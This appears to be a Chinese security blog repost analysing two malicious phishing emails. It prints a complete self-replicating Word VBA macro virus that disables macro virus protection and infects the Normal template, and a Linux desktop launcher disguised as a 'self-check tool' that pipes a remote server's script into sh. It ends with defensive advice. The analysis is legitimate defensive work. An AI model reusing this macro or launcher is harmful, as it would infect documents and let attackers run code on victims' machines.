'Close()Open()Close()Open()Private Sub Document_Open()On Error Resume NextOptions.VirusProtection = FalseEnableCancelKey = wdCancelDisabledSet maci = MacroContainer.VBProject.VBComponents.Item(1)Set macic = maci.codemodulens$ = Left(macic.Lines(1, 1), 21)Set inf = NormalTemplate: nsi$ = ns$ + "Close()"If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"Set infc = inf.VBProject.VBComponentsSet infi = infc.Item(1)Set infic = infi.codemoduleinfi.Name = "ThisDocument"For mx = 2 To infc.Countinfc.Remove infc.Item(2)Next mxIf infic.countlines <> macic.countoflines Theninfic.deletelines 1, infic.countoflinesFor coco = 1 To macic.countoflinesinfic.insertlines coco, macic.Lines(coco, 1)Next cocoinfic.replaceline 1, nsi$End IfIf Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullNameEnableCancelKey = wdCancelDisabledEnd Sub'ThisDocument v 1.0 1999
On Error Resume Next:遇到错误时,代码会继续执行下一条指令,而不是停止。Options.VirusProtection = False:关闭 Word 的病毒保护功能。EnableCancelKey = wdCancelDisabled:禁用取消键,这意味着用户无法通过按 Ctrl + S 来中断宏的执行。
[Desktop Entry]Name[zh_CN]=自查工具Type=ApplicationExec=bash -c "curl http://101.xxx.xxx.158:13338/|sh"Terminal=falseIcon=deepin-defender
-
建立完善的邮件过滤系统:通过技术手段对邮件进行过滤,识别并拦截钓鱼邮件。 -
提高员工安全意识:定期开展网络安全培训,让员工了解钓鱼邮件的识别方法,提高警惕性。 -
建立应急响应机制:及时发现并处置钓鱼邮件攻击事件,减少损失。 -
加强与相关部门的合作:与公安、通信管理局等部门加强合作,共同打击网络犯罪。
原文始发于微信公众号(Reset安全):记录两次恶意邮件分析排查记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论